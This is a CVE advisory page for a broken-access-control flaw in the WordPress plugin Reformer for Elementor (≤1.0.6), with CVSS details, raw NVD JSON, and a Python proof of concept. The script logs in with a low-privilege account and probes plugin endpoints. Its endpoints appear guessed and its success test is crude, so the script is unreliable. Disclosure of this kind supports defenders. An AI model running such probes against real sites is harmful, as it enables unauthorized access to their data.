Security Vulnerability Report
中文
CVE-2025-68086 CVSS 5.4 MEDIUM

CVE-2025-68086

Published: 2025-12-16 09:16:04
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in merkulove Reformer for Elementor reformer-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reformer for Elementor: from n/a through <= 1.0.6.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Reformer for Elementor <= 1.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68086 PoC - Reformer for Elementor Broken Access Control # This PoC demonstrates the missing authorization vulnerability import requests import sys target_url = "https://target-site.com" def check_vulnerability(): """ Check if the target site is vulnerable to CVE-2025-68086 """ # Step 1: Authenticate with low-privilege account (subscriber role) login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': 'low_priv_user', 'pwd': 'user_password', 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Authentication failed") return False print("[+] Authenticated successfully with low-privilege account") # Step 2: Try to access admin-only functionality # Common vulnerable endpoints in Reformer for Elementor vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=reformer_save_settings', '/wp-admin/admin-ajax.php?action=reformer_get_data', '/wp-json/reformer/v1/settings', '/wp-json/reformer/v1/data' ] for endpoint in vulnerable_endpoints: url = target_url + endpoint response = session.get(url) # Check if we get admin-level data without proper authorization if response.status_code == 200: if 'settings' in response.text or 'data' in response.text: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Response: {response.text[:500]}") return True print("[-] Target appears to be patched or not using vulnerable version") return False if __name__ == "__main__": print("CVE-2025-68086 - Reformer for Elementor Missing Authorization") check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68086", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:03.770", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Reformer for Elementor reformer-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reformer for Elementor: from n/a through <= 1.0.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/reformer-elementor/vulnerability/wordpress-reformer-for-elementor-plugin-1-0-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}